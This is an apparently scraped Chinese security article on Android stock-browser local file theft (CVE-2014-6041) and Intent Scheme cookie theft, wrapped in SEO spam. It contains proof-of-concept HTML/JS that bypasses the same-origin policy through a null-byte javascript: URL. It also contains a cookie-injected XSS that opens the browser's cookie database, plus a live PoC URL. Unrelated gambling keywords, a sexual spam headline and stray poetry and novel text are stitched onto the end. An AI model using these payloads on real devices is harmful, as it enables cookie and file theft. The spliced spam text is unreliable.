份子吧【Android浏览器跨域数据窃取和Intent Scheme攻击 】—-户海印,轮盘游戏,篮球指数,婚姻占卜

网络干货 litianseo 5个月前 (07-08) 55次浏览 已收录 0个评论

正文:

  Android 浏览器跨域数据窃取和 Intent Scheme 攻击  
我们接下来要介绍的这个漏洞,其影响了 Android 版本 4.4 以下的自带浏览器和一些其他特定的 Android 浏览器,它允许黑客读取 sqlite 格式的 cookie 数据库文件,从而窃取 cookie。顺着这个问题,我们来谈一谈 Android 版本 4.4 以下的跨站数据窃取攻击。
FreeBuf 小科普
Intent Scheme URL 攻击:这种攻击方式,利用了浏览器保护措施的不足,通过浏览器作为桥梁间接实现 Intend-Based 攻击。相比于普通 Intend-Based 攻击,这种方式极具隐蔽性,而且由于恶意代码隐藏 WebPage 中,传统的特征匹配完全不起作用。除此之外,这种攻击还能直接访问浏览器自身的组件(无论是公开还是私有)和私有文件,比如 cookie 文件,进而导致用户机密信息的泄露。Intent-based 攻击:这种基于 intent 的安卓攻击手法很普遍,轻则导致应用程序崩溃,重则可能演变提权漏洞。
攻击实验背景介绍
在我研究 Stock 浏览器的事务流程标准时发现,如果让浏览器打开新选项卡并且使用 file://协议,就可以通过网页打开本地文件。当然,这的确不算一个漏洞,但是如果它能在读取本地文件后,然后把该文件的信息发送到远程时,那就完全不同了。而且我留意到,这是个 Android 下浏览器的通杀漏洞,且并不仅限于 Chrome、Firefox 或者 Opera 等等。
下面的截图展示了漏洞被补后,权限被禁用,想要从菜单栏打开本地文件会发生的错误:

攻击实验方案:
为了利用这个漏洞,我们模拟了以下攻击流程:
1.骗取用户访问黑客构造的网站
2.黑客在某页面设置返回特定头部内容,使得受害者的浏览器自行下载 exploit.html
3.受害者浏览器会主动打开新选项卡,浏览 exploit.html
4.exploit.html 将读取本地敏感信息文件,反馈给黑客
为了给这次攻击构造一个有效的 exp,我同某日本安全研究员 Haru Sugiyama 讨论后,他给了我以下的 POC:
http://133.242.134.241/firefox/test.html
当你通过 Android 浏览器访问以上示例页面时,只要进行一些特定操作,其中的恶意脚本就会影响 Firefox(文章首段提到的特定的 Android 浏览器实例)或者 Android 的自带浏览器,下载恶意代码到/sdcard/Download/exploit.html,当然前提是 sdcard 这个目录确实存在。浏览器会自行在新选项卡里打开刚刚下载的恶意文件 exploit.html,然后从其他本地文件里读取内容。实际上,这个攻击过程并不如我讲的这么轻松愉快。在这里我们来做个对比实验,看看针对 Android 2.3.x 和 Android 4.1.x-4.3 进行攻击的结果区别。
?Android 2.3.x 观察报告??
实验中我们使用了 Android 2.3 的模拟器,很轻松地就通过恶意文件 exploit.html 读取到了其他本地文件的内容,这代表该版本系统浏览器存在相应的漏洞,允许恶意网站绕过 Android 浏览器同源策略,进行跨域数据窃取。但是,由于 Android 2.3.x 的使用量大约只占安卓用户的 11.4%,而且正在如 winxp 一般慢慢地消亡,所以其危害并没有那么大,Android 各版本用户使用量统计图如下:

然而 Android 4.1.x-4.3 虽然并不能直接读取本地文件,但我们在尝试了空字节绕过的小技巧后,发现收效甚好,POC 如下:
<button onclick="exploit()">Read iframe</button> 
<button onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">
Try \u0000
</button> 
<iframe src="file:/default.prop" name="test" style='width:100%;height:200'>
</iframe> 
<script> 
function exploit() 
{   
   var iframe = document.getElementsByTagName('iframe')[0];
   try
   {
   alert("Try to read local file.");     
   alert("contentWindow:"+iframe.contentWindow);     
   alert("document:"+iframe.contentWindow.document);     
   alert("body:"+iframe.contentWindow.document.body);     
   alert("innerHTML:"+iframe.contentWindow.document.body.innerHTML);   
    } 
 catch(e) 
 {
  alert(e);   
  } 
 } 
</script>
遗憾的是,据 CVE-2014-6041 所述,该漏洞已经打上补丁,经试验 exp 失效。
采用 Intent scheme URL 进行攻击
据我们以上研究得出的结论,想通过 Android 4.1.x-4.3 的浏览器进行本地文件读取是不可行的,因为在这一系列版本中,本地文件不能从任意其他文件里读取内容。然而,metasploit 团队的 Joe Vennix 表示,从 intent scheme 入手就可以轻松地发起攻击,附上相应文章,以下是文章中的 POC:

该攻击 POC 的思路是:
受害者保存了包含恶意 JS 代码的 cookie 后,浏览器打开储存该 cookie 的 sqlite 数据库文件时,附在 cookie 里被注入了的恶意 JS 代码会自动执行,从而窃取数据库文件中存在的其他 cookie。基于这个 POC,黑客可以尝试读取整个 webviewCookieChromium.db 文件。
<!doctype html>
      <html>
        <head><meta name="viewport" content="width=device-width, user-scalable=no" /></head>
        <body style='width:100%;font-size: 16px;'>
          <a href='file:///data/data/com.android.browser/databases/webviewCookiesChromium.db'>
            Redirecting… To continue, tap and hold here, then choose "Open in a new tab"
          </a>
          <script>
           document.cookie='x=<img src=x onerror=prompt(document.body.innerHTML)>';   
   </script>
        </body>
      </html>
Joe 实现了一个 Metasploit 模块,可以自动化窃取 cookie 然后反馈给黑客,即使该数据库文件采用了 httponly 技术,这种攻击手段依然是危害巨大的。
Metasploit 模块实现步骤:
下面的截图让你明白如何利用该模块获取 cookie:
第一步:设置模块

第二步:窃取 cookie
你做完了这步,就可以泡杯咖啡,坐等鱼儿上钩了。

第三步:坐等 cookie

补丁相关信息:
在 2014 年 2 月发布了补丁,其对数据库文件储存目录的权限进行了加固,但是因补丁策略限制,它并没有照顾到大部分厂商。
[参考来源 rafayhackingarticles,wooyun,译/FreeBuf 小编 dawner 翻译整理,转载请注明来自 FreeBuf 黑客与极客(FreeBuf.COM)]份子吧,户海印

———————————-

相关阅读:
轮盘游戏,篮球指数,少妇口述被男技师按摩推油被高潮经历 一个女人异性按摩经历

  重重着意天公巧,字字钟情我辈工。弄影供愁半窗月,含颦索笑一檐风。
…………………
  内侍刘有方畜名画,乃内虢国夫人夜游图最为绝笔,东坡馆北客都订驿有跋其后,既作诗录以相示,时欲和而偶未暇,今脱集得诗,遂次其韵,以申前志。天街雨过花满骢,万人壁立惊游龙。飘飘衣袂欲仙去,宝鞭遥指蓬莱宫。真人睡起春才柳,准奏琵琶最先手。合欢堂里谢使人,暗香犹带天阶尘。宛然相对若可语,笔墨顿失当时痕。www.457nkyy.com 开眼成今合眼古,回头自有来时路。长风破浪真快哉!快处须防倒骑虎。
“今日所到之人另外生命都是你给予另外,在我们这些人另外心目中你就是神,神另外存在!”寇仑话落,石生还未反应过来时,却又猛然转过头指着那些目瞪口呆另外赏金猎人们冷笑道:“告诉你们,我也曾与你们这些人一样,只是一名小小另外赏金猎人,所以我从来都不会看不起赏金猎人,但……你们却胆敢企图伤害他,我们能饶得了你们吗?”
  宣 制{伪原创 www.xianxinbing.cn 间隔符}振动盘料斗提升机婚姻占卜


32w.net , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:http://www.32w.net/ganhuo/887.html
份子吧【Android浏览器跨域数据窃取和Intent Scheme攻击 】—-户海印,轮盘游戏,篮球指数,婚姻占卜
喜欢 (0)
[576801182@qq.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址